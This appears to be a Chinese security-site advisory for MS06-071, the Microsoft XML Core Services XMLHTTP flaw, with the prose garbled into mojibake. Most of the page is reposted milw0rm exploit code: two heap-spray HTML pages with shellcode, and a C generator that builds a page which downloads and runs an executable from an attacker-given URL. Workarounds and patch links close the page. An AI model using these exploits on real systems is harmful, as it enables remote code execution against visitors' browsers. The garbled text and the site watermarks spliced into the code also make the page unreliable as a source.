Microsoft XMLºËÐÄ·þÎñXMLHTTP¿Ø¼þÄÚ´æÆÆ»µÂ©¶´

Éæ¼°³ÌÐò£º
Microsoft XML
 
ÃèÊö£º
Microsoft XMLºËÐÄ·þÎñXMLHTTP¿Ø¼þÄÚ´æÆÆ»µÂ©¶´£¨MS06-071£©
 
Ïêϸ£º
Microsoft XMLºËÐÄ·þÎñ£¨MSXML£©ÔÊÐíʹÓÃJScript¡¢VBScriptºÍMicrosoft Visual Studio 6.0µÄÓû§¹¹½¨¿ÉÓëÆäËû·ûºÏXML 1.0±ê×¼µÄÓ¦ÓóÌÐòÏ໥²Ù×÷µÄXMLÓ¦Óá£

ÔÚMicrosoft XML Core ServicesµÄXMLHTTP 4.0 ActiveX¿Ø¼þÖУ¬setRequestHeader()º¯ÊýûÓÐÕýÈ·µØ´¦ÀíHTTPÇëÇó£¬ÔÊÐí¹¥»÷ÕßÓÕÆ­Óû§·ÃÎʶñÒâµÄÕ¾µãµ¼ÖÂÖ´ÐÐÈÎÒâÖ¸Áî¡£¹¥»÷Õß¿ÉÒÔͨ¹ý¹¹½¨ÌØÖÆÍøÒ³À´ÀûÓôË©¶´£¬Èç¹ûÓû§·ÃÎʸÃÍøÒ³»òµ¥»÷µç×ÓÓʼþÖеÄÁ´½Ó£¬¸Ã©¶´¾Í¿ÉÄÜÔÊÐíÔ¶³ÌÖ´ÐдúÂë¡£³É¹¦ÀûÓôË©¶´µÄ¹¥»÷Õß¿ÉÒÔÍêÈ«¿ØÖÆÊÜÓ°ÏìµÄϵͳ¡£²»¹ý£¬ÒªÀûÓôË©¶´£¬ÐèÒª½øÐÐÓû§½»»¥¡£

<*À´Ô´£ºMicrosoft

Á´½Ó£º£¨http://secunia.com/advisories/22687/
 £ £ £¨http://www.microsoft.com/technet/security/advisory/927892.mspx?pf=true
 £ £ £¨http://marc.theaimsgroup.com/?l=full-disclosure&m=116268675301419&w=2
 £ £ £¨http://www.microsoft.com/technet/security/bulletin/ms06-071.mspx
 £ £ £¨http://www.us-cert.gov/cas/techalerts/TA06-318A.html ÖйúÍø¹ÜÂÛ̳bbs.bitsCN.com
*>

ÊÜÓ°Ïìϵͳ£º
Microsoft XML Core Services 6.0
Microsoft XML Core Services 4.0
 
¹¥»÷·½·¨£º
¾¯ ¸æ

ÒÔϳÌÐò(·½·¨)¿ÉÄÜ´øÓй¥»÷ÐÔ£¬½ö¹©°²È«Ñо¿Óë½Ìѧ֮Óá£Ê¹ÓÃÕß·çÏÕ×Ô¸º£¡

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution
Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi
Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers,
calc.exe is called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:"
>
</object>
<script>
var obj = null;
function exploit() { Íø¹ÜÍøwww.bitscn.com
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"
+
 £ 
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
 £ 
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
 £ 
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
 £ 
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
 £ 
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
 £ "%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps; Íø¹ÜÏÂÔØdl.bitscn.com
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new
Object());£ 

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>


========================================================
/*
*----------------------------------------------------------------------- ÖйúÍø¹ÜÂÛ̳bbs.bitsCN.com
*
* MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
*£  Works on Windows XP versions including SP2 and 2K
*
* Author: M03
*
*£  Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code),
*£ Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
*£ £ £  :
* Tested£ :
*£ £ £  : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
*£ £ £  :
*£ £ £  :
*£ £ £  :
*£ £ £  :
*£ £ £  :Usage: filename <exe_URL> [htmlfile]
*£ £ £  :£ £  filename.exe http://site.com/file.exe localhtml.htm£ £ 
*£ £ £ 
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fp = NULL;
char *file = "MicroHack.htm";
char *url = NULL;

unsigned char sc[] =£ 
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"

Íø¹ÜÍøwww_bitscn_com

"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";

char * header =
"<html xmlns=\"http://www.w3.org/1999/xhtml\">\n"
"<body>\n"
"<object id=target classid=\"CLSID:\" >\n" Íø¹ÜÍøwww.bitscn.com
"</object>\n"
"<script>\n"
"var obj = null;\n"
"function exploit() {\n"
"obj = document.getElementById('target').object;\n"

"try {\n"
"obj.open(new Array(),new Array(),new Array(),new Array(),new Array());\n"
"} catch(e) {};\n"

"sh = unescape (\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\" +\n"
" ";

char * footer =
"\n"
"sz = sh.length * 2;\n"
"npsz = 0x400000-(sz+0x38);\n"
"nps = unescape (\"%u0D0D%u0D0D\");\n"
"while (nps.length*2<npsz) nps+=nps;\n"
"ihbc = (0x12000000-0x400000)/0x400000;\n"
"mm = new Array();\n"
"for (i=0;i<ihbc;i++) mm[i] = nps+sh;\n"
"\n"
"obj.open(new Object(),new Object(),new Object(),new Object(), new Object());\n"£ 
"\n"
"obj.setRequestHeader(new Object(),'......');\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"}\n"
"</script>\n"
"<body onLoad='exploit()' value='Exploit'>\n"
"\n"
"</body></html>\n"
"\n";

// print unicode shellcode ÖйúÍø¹ÜÁªÃËbitsCN.com
void PrintPayLoad(char *lpBuff, int buffsize)
{
  int i;
  for(i=0;i<buffsize;i+=2)
  {
 £ £ if((i%16)==0)
 £ £ {
 £ £ £ if(i!=0)
 £ £ £ {
 £ £ £ £  printf("\"\n\"");
 £ £ £ £  fprintf(fp, "%s", "\" +\n\"");
 £ £ £ }
 £ £ £ else
 £ £ £ {
 £ £ £ £  printf("\"");
 £ £ £ £  fprintf(fp, "%s", "\"");
 £ £ £ }
 £ £ }
 £ £ £ 
 £ £ printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
 £ £ 
 £ £ fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
 £ }
 £ 

 £ £ printf("\";\n");
 £ £ fprintf(fp, "%s", "\");\n");£ £ £ 
 
 
  fflush(fp);
}

void main(int argc, char **argv)
{
  unsigned char buf[1024] = ; Íø¹ÜÏÂÔØdl.bitscn.com

  int sc_len = 0;


  if (argc < 2)
  {
 £  printf("MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (0day)\n");
 £  printf("Code modded from LukeHack\n");
 £  printf("\r\nUsage: %s <URL> [Local htmlfile]\r\n\n", argv[0]);
 £  exit(1);
  }
 
  url = argv[1];
 

 £ if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
 £ {
 £ £ printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
 £ £ return;£ £ £ £ £ 
 £ }

 £  printf("[+] download url:%s\n", url);
 £ 
 £  if(argc >=3) file = argv[2];
 £  printf("[+] exploit file:%s\n", file);
 £ £ 
  fp = fopen(file, "w");
  if(!fp)
  {
 £ £ printf("[-] Open file error!\n"); Íø¹Übitscn_com
 £ £ £ return;
  }£ 
 
  fprintf(fp, "%s", header);
  fflush(fp);
 
  memset(buf, 0, sizeof(buf));
  sc_len = sizeof(sc)-1;
  memcpy(buf, sc, sc_len);
  memcpy(buf+sc_len, url, strlen(url));
 
  sc_len += strlen(url)+1;
  PrintPayLoad(buf, sc_len);

  fprintf(fp, "%s", footer);
  fflush(fp);
 
  printf("[+] exploit write to %s success!\n", file);
}

// Reverse Microsoft IE 9/11 Exploit

// milw0rm.com [2006-11-10]


=================================================================
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<script>
 £ var heapSprayToAddress = 0x05050505;

 £ var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

ÖйúÍø¹ÜÁªÃËbitsCN.com

</script>
<script>
 £ var heapBlockSize = 0x400000;

 £ var payLoadSize = payLoadCode.length * 2;

 £ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

 £ var spraySlide = unescape("%u9090%u9090");
 £ spraySlide = getSpraySlide(spraySlide,spraySlideSize);

 £ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

 £ memory = new Array();

 £ for (i=0;i<heapBlocks;i++)
 £ {
 £ £ memory[i] = spraySlide + payLoadCode;
 £ }



 £ function getSpraySlide(spraySlide, spraySlideSize)
 £ {
 £ £ while (spraySlide.length*2<spraySlideSize)
 £ £ {
 £ £ £  spraySlide += spraySlide;
 £ £ }
 £ £ spraySlide = spraySlide.substring(0,spraySlideSize/2);
 £ £ return spraySlide;
 £ }

</script>
<object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" > Íø¹Übitscn_com
</object>
<script>
var obj = null;

obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());£ 

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);

</script>


</body></html>

# milw0rm.com [2006-11-10] Íø¹Üu¼Òu.bitscn@com
 
 
½â¾ö·½°¸£º
ÁÙʱ½â¾ö·½·¨£º

* ½ûÖ¹ÔÚInternet ExplorerÖÐÔËÐÐXMLHTTP 4.0 ActiveX¿Ø¼þ¡£½«ÒÔÏÂÄÚÈÝÕ³Ìùµ½Îı¾±à¼­Æ÷£¬È»ºóʹÓÃ.regÎļþÃûÀ©Õ¹±£´æ£º

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\]
"Compatibility Flags"=dword:00000400

Ë«»÷Õâ¸ö.regÎļþÓ¦Óõ½ÏµÍ³¡£

* ÅäÖÃInternet ExplorerÔÚÔËÐл½Å±¾Ö®Ç°ÒªÇóÌáʾ£¬»òÔÚInternetºÍ±¾µØintranetÇøÖнûÓû½Å±¾¡£
* ½«InternetºÍ±¾µØintranet°²È«ÇøÉèÖÃΪ¡°¸ß¡±¡£
* ¾Ü¾ø¶Ô×¢²á±íÖÐMicrosoft XML Core Services 4.0 ()ºÍMicrosoft XML Core Services 6.0 ()µÄÊÜÓ°ÏìµÄCLSID½øÐзÃÎÊ¡£

³§É̲¹¶¡£º

Microsoft
---------
MicrosoftÒѾ­Îª´Ë·¢²¼ÁËÒ»¸ö°²È«¹«¸æ£¨MS06-071£©ÒÔ¼°ÏàÓ¦²¹¶¡:
MS06-071£ºVulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (928088)
Á´½Ó£º£¨http://www.microsoft.com/technet/security/bulletin/ms06-071.mspx

²¹¶¡ÏÂÔØ£º
£¨http://www.microsoft.com/downloads/details.aspx?FamilyId=24B7D141-6CDF-4FC4-A91B-6F18FE6921D4
£¨http://www.microsoft.com/downloads/details.aspx?FamilyId=9AE7F4E9-8228-4098-AF71-49C35684C17E